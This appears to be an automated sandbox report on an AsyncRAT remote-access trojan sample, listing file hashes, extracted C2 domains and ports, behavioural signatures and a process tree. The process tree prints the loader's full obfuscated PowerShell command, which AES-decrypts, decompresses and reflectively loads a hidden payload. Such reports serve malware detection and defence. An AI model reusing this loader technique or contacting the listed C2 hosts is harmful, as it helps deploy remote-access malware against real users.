Analysis
- max time kernel: 36s
- max time network: 35s
- platform: windows7_x64
- resource: win7-20221111-en
- resource tags: arch:x64 arch:x86 image:win7-20221111-en locale:en-us os:windows7-x64 system
- submitted: 01-02-2023 20:06
Behavioral task
behavioral1
Sample
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
Resource
win7-20221111-en
General
- Target: 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
- Size: 72KB
- MD5: 8cb1d168cf75e754026203935dcfa023
- SHA1: ba18d6636f1c59a72fa8042cff7c1e8fdf69eecb
- SHA256: 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126
- SHA512: 7254e3bc08701fb233d1b0c340fd6104b9fc4d36ab962f7ac541f0aee539fe3c9a7b3fa692968a977e68690ad183e77d2b5f962b1265983b4771773ff55c62ae
- SSDEEP: 1536:/rGBmYaZyxKeBy3bCXS4ZeUSlACnztfx:/rGBmYaZyxZBy3bCHelAI9x
Malware Config
Extracted
- Family: asyncrat
- Version: 0.5.7B
- Botnet: Default
- C2:
  churchmon.ddns.net:6606
  churchmon.ddns.net:7707
  churchmon.ddns.net:8808
  churchmon21.ddns.net:6606
  churchmon21.ddns.net:7707
  churchmon21.ddns.net:8808
  churchmon22.ddns.net:6606
  churchmon22.ddns.net:7707
  churchmon22.ddns.net:8808
- Mutex: AsyncMutex_6SI8OkPnk
- Attributes:
  delay: 3
  install: false
  install_folder: %AppData%
Signatures
- Async RAT payload (2 IoCs)
  Resources (yara_rule: asyncrat):
  behavioral1/memory/1184-54-0x00000000010B0000-0x00000000010C2000-memory.dmp
  behavioral1/memory/1184-56-0x0000000000590000-0x00000000005B2000-memory.dmp
- Executes dropped EXE (1 IoC)
  Processes:
  pid 736   gefcmy.bat.exe
- Deletes itself (1 IoC)
  Processes:
  pid 532   cmd.exe
- Loads dropped DLL (1 IoC)
  Processes:
  pid 1100  cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Delays execution with timeout.exe (1 IoC)
  Processes:
  pid 808   timeout.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes:
  pid 1456  powershell.exe
  pid 1456  powershell.exe
  pid 1456  powershell.exe
  pid 736   gefcmy.bat.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description / pid / process):
  Token: SeDebugPrivilege  pid 1184  8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
  Token: SeDebugPrivilege  pid 1456  powershell.exe
  Token: SeDebugPrivilege  pid 736   gefcmy.bat.exe
- Suspicious use of WriteProcessMemory (24 IoCs)
  Processes (description / pid / process -> target process; each row was recorded 4 times):
  PID 1184 wrote to memory of 916   8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe -> cmd.exe
  PID 1184 wrote to memory of 532   8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe -> cmd.exe
  PID 916 wrote to memory of 1456   cmd.exe -> powershell.exe
  PID 532 wrote to memory of 808    cmd.exe -> timeout.exe
  PID 1456 wrote to memory of 1100  powershell.exe -> cmd.exe
  PID 1100 wrote to memory of 736   cmd.exe -> gefcmy.bat.exe
Processes (process tree; numbers give the nesting depth)
1. C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
  2. C:\Windows\SysWOW64\cmd.exe
     Command line: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gefcmy.bat"' & exit
     - Suspicious use of WriteProcessMemory
    3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
       Command line: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\gefcmy.bat"'
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of WriteProcessMemory
      4. C:\Windows\SysWOW64\cmd.exe
         Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\gefcmy.bat" "
         - Loads dropped DLL
         - Suspicious use of WriteProcessMemory
        5. C:\Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
           Command line: "gefcmy.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DlAMm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\gefcmy.bat').Split([Environment]::NewLine);foreach ($gnxLA in $DlAMm) { if ($gnxLA.StartsWith(':: ')) { $EieGe = $gnxLA.Substring(3); break; }; };$CtMSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($EieGe);$CdbBY = New-Object System.Security.Cryptography.AesManaged;$CdbBY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CdbBY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CdbBY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NEPcZ0sSGxev/0ytodeTKgGxdiSyFK6PvVJKMsPopm0=');$CdbBY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x/ZAOJI37zOKAo+7A/xutg==');$bwBZg = $CdbBY.CreateDecryptor();$CtMSE = $bwBZg.TransformFinalBlock($CtMSE, 0, $CtMSE.Length);$bwBZg.Dispose();$CdbBY.Dispose();$OapWv = New-Object System.IO.MemoryStream(, $CtMSE);$Otndw = New-Object System.IO.MemoryStream;$HxJaj = New-Object System.IO.Compression.GZipStream($OapWv, [IO.Compression.CompressionMode]::Decompress);$HxJaj.CopyTo($Otndw);$HxJaj.Dispose();$OapWv.Dispose();$Otndw.Dispose();$CtMSE = $Otndw.ToArray();$HiNYF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CtMSE);$wpmOJ = $HiNYF.EntryPoint;$wpmOJ.Invoke($null, (, [string[]] ('')))
           - Executes dropped EXE
           - Suspicious behavior: EnumeratesProcesses
           - Suspicious use of AdjustPrivilegeToken
  2. C:\Windows\SysWOW64\cmd.exe
     Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8838.tmp.bat""
     - Deletes itself
     - Suspicious use of WriteProcessMemory
    3. C:\Windows\SysWOW64\timeout.exe
       Command line: timeout 2
       - Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\gefcmy.bat
  Filesize: 325KB
  MD5: 36438d908fc48e243fc04035eba3a6cd
  SHA1: a552a88e74440a1137b3a3a14e4089a630dfb855
  SHA256: 80504bf8dd15434a9841595f3f9e405f8843dd53b292d8e30d9a15b53b51fa7a
  SHA512: 3cea5f310c94129fe89c1cebfada52b4d0ac1d4f4e7be4ea06872b90e969b2bec4e322a127f6c4b02a9223ad6a29b21f90c1d627f233f938ded51da3ff6fd611
- C:\Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
  Filesize: 442KB
  MD5: 92f44e405db16ac55d97e3bfe3b132fa
  SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
  SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
  SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
- C:\Users\Admin\AppData\Local\Temp\tmp8838.tmp.bat
  Filesize: 216B
  MD5: b114271fc8c4f0f20cc0cf6b5315bec7
  SHA1: e83d81844f32e140a7de1f455fb3464551bfb27e
  SHA256: 7db48b1affca55499bcdecfc3597346246c7b1f04aa8e0b8ea23e2de541bf892
  SHA512: 9a3ab883bfd4be07c3bb19e89cbedd90ec7fe1820e7ded15d918397182ed18f9ee9c24a657f77bebe8f34d696a59391fe83c6d892f5e9e44a18d8bc5e0bcf8d9
- \Users\Admin\AppData\Local\Temp\gefcmy.bat.exe
  Filesize: 442KB
  MD5: 92f44e405db16ac55d97e3bfe3b132fa
  SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
  SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
  SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
- memory/532-58-0x0000000000000000-mapping.dmp
- memory/736-68-0x0000000000000000-mapping.dmp
- memory/736-71-0x0000000074400000-0x00000000749AB000-memory.dmp
  Filesize: 5.7MB
- memory/736-72-0x0000000074400000-0x00000000749AB000-memory.dmp
  Filesize: 5.7MB
- memory/808-61-0x0000000000000000-mapping.dmp
- memory/916-57-0x0000000000000000-mapping.dmp
- memory/1100-65-0x0000000000000000-mapping.dmp
- memory/1184-54-0x00000000010B0000-0x00000000010C2000-memory.dmp
  Filesize: 72KB
- memory/1184-56-0x0000000000590000-0x00000000005B2000-memory.dmp
  Filesize: 136KB
- memory/1184-55-0x0000000075BE1000-0x0000000075BE3000-memory.dmp
  Filesize: 8KB
- memory/1456-59-0x0000000000000000-mapping.dmp
- memory/1456-63-0x0000000073F30000-0x00000000744DB000-memory.dmp
  Filesize: 5.7MB
- memory/1456-66-0x0000000073F30000-0x00000000744DB000-memory.dmp
  Filesize: 5.7MB